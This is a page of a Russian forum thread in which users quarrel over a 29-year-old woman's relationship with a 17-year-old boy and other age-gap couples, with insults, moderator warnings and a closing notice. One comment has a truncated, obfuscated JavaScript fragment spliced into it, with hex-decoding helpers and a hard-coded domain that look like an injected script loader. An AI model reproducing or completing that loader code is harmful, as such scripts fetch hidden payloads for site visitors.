24 ноября 2015 02:15:04
2015-11-24 02:15:04

Странная_Такая , Это ее жизнь ей решать. Хоть ему 15. По законам редко кто сейчас живет. И она может дождаться кошда ему будет 18 проблемы не вижу как ее видишь ты.

Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

24 ноября 2015 02:17:15
2015-11-24 02:17:15

Моей бабушке 60. Ее мужу 40. Живут душа в душу. Сама завидую. И что теперь?послать к черту любовь из-за возраста... бред

Ответить
Поддерживаю Да0 / Нет3
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 02:18:41
2015-11-24 02:18:41

Виктория1994 , А как же совращение несовершеннолетних.. ?Да, Вы правы, у нас к сожелению по законам никто давно не живет, не по прописным на по духовным.....

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 02:21:49
2015-11-24 02:21:49

Зашла специально на ее страницу, прямо интересно стало. Давненько мы не общались, в общем неважно. Перепутала я, я же примерно считала, по своим воспоминаниям. На самом деле ей сейчас 38, ему 28. Не 9, 5, а 10, 5 лет разница у них.

Так что автор, поменьше слушайте других. Каждая ситуация индивидуальна. Да, если честно, на первый взгляд разница у вас жутковатая. Я бы на вашем месте повременила с замужеством еще годик. Поживите вместе, попробуйте как оно. Хоть до 19 подождите.

А вообще я считаю, что в 17-19 лет вполне можно быть настоящим мужчиной. Хоть и маленьким. По крайней мере иметь к этому задатки. Те, кто говорит о маминой сиське и таблице умножения, всего лишь судят по себе. Вы же это понимаете?

Не берите в голову, пожалуйста, мне как-то прямо очень обидно за вас стало (хоть вы возможно все-таки и тролль), может быть из-за того, что у меня на глазах развернулась история любви моей знакомой Тани.

А люди пусть смеются, если им смешно. Они смеются не над вами, а над своей глупостью.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет1
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

24 ноября 2015 02:22:13
2015-11-24 02:22:13

Зато когда ей 40 будет. У нее будет молодой муж)))Круто же. Она девушка опытная многому научит. Что все так критично в ее сторону относитесь.

Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

24 ноября 2015 02:23:39
2015-11-24 02:23:39

Странная_Такая , Подождать год я думаю это не так уж и много. И можно атк то уже с 16 если что по законам. А брак с 18. Ему не далеко до 18 лет.

Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
24 ноября 2015 02:30:15
2015-11-24 02:30:15

Сиреневая Кошка, ты ее защищаешь из-за своей знакомой! Ты подсознательно ее ассоциируешь со своей Татьяной! Ты даже по комментам везде проводишь эту аналогию! Но это не твоя Татьяна, это тролль! Будто ты сама не знаешь, а сколько у нас троллей на сайте, будто это первый раз!

Виктория1994 , а вы часом не адвокат автора, нет? А может ее знакомая? Или вообще одно и тоже лицо, а? Слишком уж вы настойчиво ее защищаете для простого комментатора!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 02:30:17
2015-11-24 02:30:17

Виктория1994 , {#}бабушке 60, а "дедушке" 40? Ну.... Что ж.... Счастья им. Мир сошел с ума...... Но он же в сознательном возрасте принял решение жениться на Вашей бабушке, не в 17 лет, надеюсь... Когда человек находится в совершеннолетнем возрасте, за все поступки, которые он совершает, он несет ответственность сам, и решения, которые он принимает-это его решения. А несовершеннолетним могут управлять старшие.

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
24 ноября 2015 02:35:32
2015-11-24 02:35:32

Странная_Такая , да может и нет никакой бабушки 60 лет и ее мужа, которому 40 лет... Велика слишком разница и не в ее пользу. Он еще мужик в расцвете сил по сути, а она бабушка уже...

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

24 ноября 2015 02:35:44
2015-11-24 02:35:44

Странная_Такая , Ну я его дедушкой назвать еше не могу. Да у них все хорошо. Она очень молодо выглядит. Им многие завидуют любовь у них. И свадьба была два года назад. Насчет Автора, то это только ей решать. Если даже это будет ошибка, то она потом это сама поймет как глупо поступила, а если все хорошо, то почему бы и нет. Насчет парня ну я уж не считаю , что он аткой маленький.... Вообще моей тетке 42 ее парню 18))))вообще не в возрасте дело. Молодые наоборот любят опытных девушек. Я думаю это не страшно.

Ответить
Поддерживаю Да1 / Нет2
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 02:41:54
2015-11-24 02:41:54

Виктория1994 , Расписать даже тоже в 16 могут, по-моему. Если суд сочтет, что это в интересах брачующихся. Но мы здесь не о законах спорим.

Читательница , Я защищаю ее, потому что я знаю на реальном примере, что такие браки возможны и реальны. И эта Татьяна ничем не хуже моей знакомой Татьяны. А еще я защищаю ее потому что противно читать некоторые особенно недалекие комменты про сиськи и таблицы умножения и мерзкий ржач над этими плоскими шутками. Тебе не противно будет это перечитать? А ведь человек совета спросил.

Мне не нравится, когда повинуясь стадному чувству, все наваливаются на одного и пишут подряд сотню пустых комментов в которых тупо издеваются над автором. От некоторых другого, в принципе, и не ждешь, там все ясно, но особенно неприятно видеть среди таких обсуждений пользователей, которых я раньше считала нормальными.

Флудить больше не буду. Вступать с вами в спор тем более. Отвечаю только тебе Читательница . Вам смешно плескаться своей желчью - на здоровье. Ваше право. Мое право отписать адекватный комментарий по теме.

Ответить
Поддерживаю Да4 / Нет1
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 02:45:14
2015-11-24 02:45:14

Читательница , Слушайте, я спорю не для того , что б кого то обидеть и достать... Я ПРАВДА не понимаю. КАк это мужчина в 40 лет может жить с бабушкой с климаксом и аааа, а теперь еще тетя 42 и парень 18... Сейчас педофилия в моде????Если бы у меня был сын, я никогда бы не позволила ему притащить невестку, мою ровесницу. Ну это же противоестественно. А Сиреневая Кошка любит поспорить, этоя давно заметила.

Ответить
Поддерживаю Да4 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

24 ноября 2015 02:45:53
2015-11-24 02:45:53

Сиреневая Кошка, Да вы правы

Ответить
Поддерживаю Да1 / Нет1
Гость
Гость

24 ноября 2015 02:47:40
2015-11-24 02:47:40

Странная_Такая , Ахахаа вот так и может. И это поверь не один случай. Такое ощущение, что ты в первобытном веке живешь. Насчет климакса ты зря. Она молодой выглядит, следит за собой, и вполне спокойная маразма еше старческого нет.

Ответить
Поддерживаю Да1 / Нет2
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 02:49:59
2015-11-24 02:49:59

Сиреневая Кошка, Мы и давали советы, пока автор не начала исполнять. Пока не подключился её типа парень.... Но выяснилось, что автору советы не нужны, потому что она с самого начала сидит и ржет над ними.

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

24 ноября 2015 02:54:06
2015-11-24 02:54:06

На старости жизнь не заканчивается)

Ответить
Поддерживаю Да0 / Нет1
Жена ингуша
8745 Жена ингуша
Жена ингуша offline
Репутация : 2564223
Комментариев 14453 50
24 ноября 2015 03:03:33
2015-11-24 03:03:33
Странная_Такая,
Напоминание
причина: Флуд, переход на личности
Ответить
Поддерживаю Да0 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
24 ноября 2015 03:07:22
2015-11-24 03:07:22

Сиреневая Кошка, Во-первых, я не писала ничего ни про какие сиськи! Какое дурацкое слово, фу! Я не употребляю даже его! Во-вторых, я ни какой желчью не исхожу. Что за бред? Может ты сегодня не с той ноги встала? Я тебе про адвокатов ничего и не говорила, коммент про адвокатов был не тебе! В-третьих, да такая ситуация могла бы где-то случиться, но данная история тролльская! В-четвертых, я уверена, что ты ее защищаешь именно потому, что у твоей знакомой была такая ситуация!

Виктория1994 , ооооооооооооооооо, у всех родственников, как я погляжу не равные браки!{#} Теперь еще и тетке 42 года, а ее мужику 18, ахахаха!{#} Тролль вы, милочка! Самый натуральный!{#} Такой же, как и автор! А маме вашей случаем не 40, а ее мужу часом не 15, нет?{#} А то у вас в семействе это же модно, да?{#}

Виктория1994 , и кто вам позволил вообще меня оскорблять? Явно не от большого ума вы это делаете!{#} Бан вам дать, чтоб подумали над своим поведением денек, другой! У нас оскорбления на сайте запрещены вообще-то!

Виктория1994 , не судите по себе! Как же можно обмануть того, кто не верит? И да, не тыкайте мне, мы с вами на "ты" не переходили!

Виктория1994 , при чем тут маразм и как она выглядит? Скажите еще, что она затмевает 20-летних и фору им дает!{#} Ее возраст никто не отменял, как бы хорошо она не выглядела!{#}

Ответить
Поддерживаю Да3 / Нет1
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 03:19:22
2015-11-24 03:19:22

Читательница , Я не говорила об адвокатах тоже. Ты пыталась объяснить мне, почему я защищаю автора. А я объяснила тебе, почему. И когда ты мне писала, что я защищаю автора, я ее не защищала, а лишь высказалась по теме, привела пример из жизни и не поддержала ваши издевательства.

А вообще я не модератор, но позволю себе сделать замечание. Девчонки, завязывайте оскорблять друг друга. Вы же леди, мать его за ногу :). Утром придет злая тетя Айна-Жена Ингуша или модератор Валерия и им придется все это дерьмо здесь чистить.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Жена ингуша
8745 Жена ингуша
Жена ингуша offline
Репутация : 2564223
Комментариев 14453 50
24 ноября 2015 03:21:18
2015-11-24 03:21:18
Читательница,
Напоминание
причина: Переход на личности, флуд
Ответить
Поддерживаю Да0 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Жена ингуша
8745 Жена ингуша
Жена ингуша offline
Репутация : 2564223
Комментариев 14453 50
24 ноября 2015 06:56:50
2015-11-24 06:56:50
Неалина,
Напоминание
причина: Флуд
Ответить
Поддерживаю Да0 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
24 ноября 2015 06:58:14
2015-11-24 06:58:14

По комментариям поддерживаю Читательницу и Странная Такая согласна с вашими комментариями.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Жена ингуша
8745 Жена ингуша
Жена ингуша offline
Репутация : 2564223
Комментариев 14453 50
24 ноября 2015 07:55:12
2015-11-24 07:55:12
Запильщик88,
Напоминание
причина: Флуд, переход на личности
Ответить
Поддерживаю Да0 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 11:10:14
2015-11-24 11:10:14

Доброе утро, а как так? Комментатор Виктория обложила Читательницу оскорблениями, потом меня старухой 10 раз назвала и её комментария с оскорблениями вообще нет. А мы с Читательницей флудильщицы..... ))))

Ответить
Поддерживаю Да3 / Нет1
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Таня
Таня

24 ноября 2015 11:18:26
2015-11-24 11:18:26
Сиреневая кошка -спасибо! просто даже за то, что увидели мой вопрос. и вообще, спасибо тем, кто по теме отвечал, а не осуждал... пусть даже это была и критика. к которой, кстати, отношусь нормально. мы решили, вопреки всем, доказать, что будет всё у нас хорошо!!! многие закрывают глаза на слово -любовь... будто бы не любили никогда... через 2-3 месяца ему 18 кстати. но это конечно вы всё равно перевернете... и все равно найдете как осудить. читаю многих, и думаю -некоторые комментарии, это один и тот же человек, под разными никами... и некоторые, кажется, специально здесь перепалку раздували... ведь вопрос был -расскажите, были ли подобные ситуации, у кого то, может примеры есть, чем закончилось... такое ощущение, что вопрос то и не читают!!! а сразу кидаются грязью поливать.... ну что же... те кто оскарбил, облил грязью-вы нам стимул дали, доказать, что любовь бывает, несмотря на возраст, и разницу в нем. кстати, в клубы я хожу))) 29 это не старость))) про клуб написал кто то маленький... ))) кому 29 еще не было... и он считает что это чуть ли не старость.... вы же нас не видели, настолько обсуждать , я конечно не хвалюсь, но мне дают 25-27... а он совсем не маленький мальчик... нельзя вешать такие ярлыки не зная людей...
Ответить
Поддерживаю Да3 / Нет1
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 11:19:33
2015-11-24 11:19:33

[Парень|c950101], [Таня|c950097], {#}Совет Вам и любовь. Парень, не забудьте спортивную форму в школу и бутерброды, Таня , последний совет, что бы сплотить Вашу семью: переведите дочь в одну школу с отчимом, пусть налаживают родственный контакт на переменках.

Ответить
Поддерживаю Да5 / Нет2
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 11:37:35
2015-11-24 11:37:35

Таня, Да, мне тоже казалось в детстве, что в 30 лет уже глубокая старость :). И все, что остается ччеловеку в таком возрасте, это постепенно готовится к смерти.

Сейчас мне тоже уже каким-то образом 27, а меня до сих пор пытаются склеить мальчики лет по 16-17. И в клубе я многим 18-тилетним фору дам, если захочется. Не хочется писать банальные фразы о том, что возраст - это всего лишь цифра, или что женщине столько лет, насколько она выгляди или чувствует себя.

Не расстраивайтесь из-за грубости и глупых издевок в ваш адрес в комментариях. Я просто уверена, что уважающий себя и окружающих человек не станет так себя вести и обезьянничать, а на других не стоит и внимания обращать. Они в 18 лет учили таблицу умножения и сидели под маминой сиськой. Что еще с них взять.

Удачи вам.

Ответить
Поддерживаю Да1 / Нет1
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 11:41:28
2015-11-24 11:41:28

Странная_Такая , У вас потрясающие шутки. Их можно как камушки пускать по глади воды. Я думаю, титул "мисс искрометность" определенно ваш.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
24 ноября 2015 11:45:26
2015-11-24 11:45:26

Странная_Такая , Ага я тоже флудильщица с вами хотя никого не оскорбила. Наоборот написала что оскарбления не писали. И мое все удалили хоть там я и призывала не ругатся. Здорово!

Ответить
Поддерживаю Да3 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

24 ноября 2015 11:49:14
2015-11-24 11:49:14
Девченки, какие же вы злые. Ужас просто, честное слово. А я вот верю в любовь . Верю, что и такие браки счастливые возможно. Пусть эта история выдумка, но ведь такое бывает. Не понимаю вашего поведения, накинулись как голодные волки. Очень неприятно было такие комментарии читать. Гадкий осадок остался. У меня мама начала встречаться с отчимом ему было 16. Она была замужем и с двумя детьми. Разница семь лет у них. Вот живут больше 20 лет, совместных детей родили. Он поднялся. В жизни всякое бывает, не стоит так накидываться и высмеивать .
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

24 ноября 2015 11:50:28
2015-11-24 11:50:28

Странная_Такая , Жалуетесь как пятилетний ребенок. Даже читать противно!Вы со своей читательницей везде суете свой нос. Помимо Виктории. И прошу администрацию обратить внимания на их другие комментарии

Ответить
Поддерживаю Да0 / Нет1
Гость
Гость

24 ноября 2015 11:51:14
2015-11-24 11:51:14

Сиреневая Кошка, Они обе такие)))

Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

24 ноября 2015 11:59:21
2015-11-24 11:59:21
Странная_Такая , Куда же всем простым людям до вас? Вы же у нас такая правильная и чистая. Нимб не жмет?
Ответить
Поддерживаю Да1 / Нет2
Гость
Гость

24 ноября 2015 11:59:22
2015-11-24 11:59:22

Гость, Просто тут сидят не оень две хорошие девушки. Они оскобляют кто их старше. И как я не замечал везде пишут только плохое.

Ответить
Поддерживаю Да0 / Нет2
Гостья
Гостья

24 ноября 2015 11:59:44
2015-11-24 11:59:44
Очень разочарована сайтом. Скатился до ЖЖ. Комментарии явно многие не от большого ума оставляют. Читать противно. Главное пишут другие, а стыдно за такое почему-то мне.
Ответить
Поддерживаю Да0 / Нет1
Гостья
Гостья

24 ноября 2015 12:06:14
2015-11-24 12:06:14
В жизни всякое бывает. 12 лет это еще не большая разница, бывает больше. Скорее смущает его юность. Было бы ему лет 20-25, примерно, другое дело. Будь разница хоть 15 лет, она уже не будет так ощущаться. Действительно браки, когда один из супругов только вышел из школы не редко заканчиваются разводом. Не важно девочка была или мальчик. Советую вам пока встречаться с парнем, не рассчитывать на него серьезно. Дальше жизнь покажет. В принципе разница нормальная и браки такие вполне бывают. Осложнения тут не в том, что между вами 12 лет и вы старше, а в том, что ему пока еще 17 лет.
Ответить
Поддерживаю Да2 / Нет0
Гостья
Гостья

24 ноября 2015 12:06:57
2015-11-24 12:06:57
Странная_Такая , Зато если дочь приведет в 17 лет 29 парня вы воспримете это нормально? Для вас когда женщина в самом рассвете сил, в 40 лет, живет с 60 летнем дедушкой импотентом более нормально?
Ответить
Поддерживаю Да1 / Нет1
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
24 ноября 2015 12:22:45
2015-11-24 12:22:45

Странно что одним не зачинщикам дали предупреждение во флуде, а те кто зачинщики до сих пор пишут едкие замечания. Мдаааа.

Ответить
Поддерживаю Да3 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

24 ноября 2015 13:57:03
2015-11-24 13:57:03
Сиреневая Кошка, вот именно что мальчики по 17 лет тебя только склеить на одну ночь хотят но никак не отношения строить с тобой а все потому что им лет мало. Твой пример лишний раз только доказывает что возраст играет роль.
Ответить
Поддерживаю Да2 / Нет0
Farba
11357 Farba
Farba online
Репутация : 123226
Комментариев 1521 1
24 ноября 2015 14:03:41
2015-11-24 14:03:41

Гостья, а что такое норма в отношениях и кто ее установил для разницы в возрасте? На мой взгляд, 10 лет это вообще не критично, главное чтобы была любовь, доверие и уважение друг к другу. А вы тут все сводите к сексу. Может, для этой 40-летней женщины этот 60-летний мужчина самый лучший и единственный на свете и она его не променяет даже на молодого красавца. Я, кстати, знаю примеры удачных браков с большой разницей в возрасте, так что дело не всегда в годах.

Ответить
Поддерживаю Да1 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 14:28:36
2015-11-24 14:28:36

Сиреневая Кошка, Уважаемая, спасибо за внимание. Скажите, а как Вам удается при полном отсутствии чувства юмора жить в нашей стране? Я так поняла-мы землячки?

Ответить
Поддерживаю Да4 / Нет3
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 14:32:35
2015-11-24 14:32:35

Запильщик88 , Говорите по делу, а комментировать мои комментарии-честь для людей разумных, здесь не об этом! Герман, а это не ты вернулся?? ? Тот тролль был Герман 8, а этот запильщик88, странные совпадения, и манера поведения одинаковая- подогреть конфликт)

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Модератор
3664 Модератор
Модератор offline
Репутация : 1697463
Комментариев 11857 0
24 ноября 2015 14:51:49
2015-11-24 14:51:49

История закрывается ввиду продолжения конфликта и отсутствия конструктивных советов по сути истории.

Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

24 ноября 2015 15:09:30
2015-11-24 15:09:30
Farba, вот именно что если бы это был 60 летний мужчина и 40 лет женщина то это еще было бы как то нормально можно было бы как то поверить но тут то наоборот женщине 60 а мужчине 40, а не мужчине 60. вы ничего не поняли не разобрались а пишите комментарии без разбора ситуации.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

24 ноября 2015 15:09:38
2015-11-24 15:09:38

Странная_Такая , Простите, но у вас вообще нет некакого юмора. Если вы считаете за юмор оскорблять старых людей, то советую вам в камеди батл сходить что бы опозориться пед всеми!

Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

24 ноября 2015 15:10:02
2015-11-24 15:10:02

Странная_Такая , По вашим словам тут получается тут многие тролли?гости которые оставляли свои мненеи по поводу возраста которые положительные они, что тоже по вашему просто так эт опишут. Задумайтесь вам не я один пишу. Я тут сентября и про какого Германа вы там говорите я вооще не понимаю. Лучше бы удалили свою первую историю не стыдились бы. Пежде чем других учить жизни. Конфликт тутникто не подогревает тут многие люди обернулись к вам так как вы этого заслуживаете. Не считая ваших подружек. Которые не далеко от вас ушли в манере воспитания.

Ответить
Поддерживаю Да0 / Нет2
Страница : 1 [2]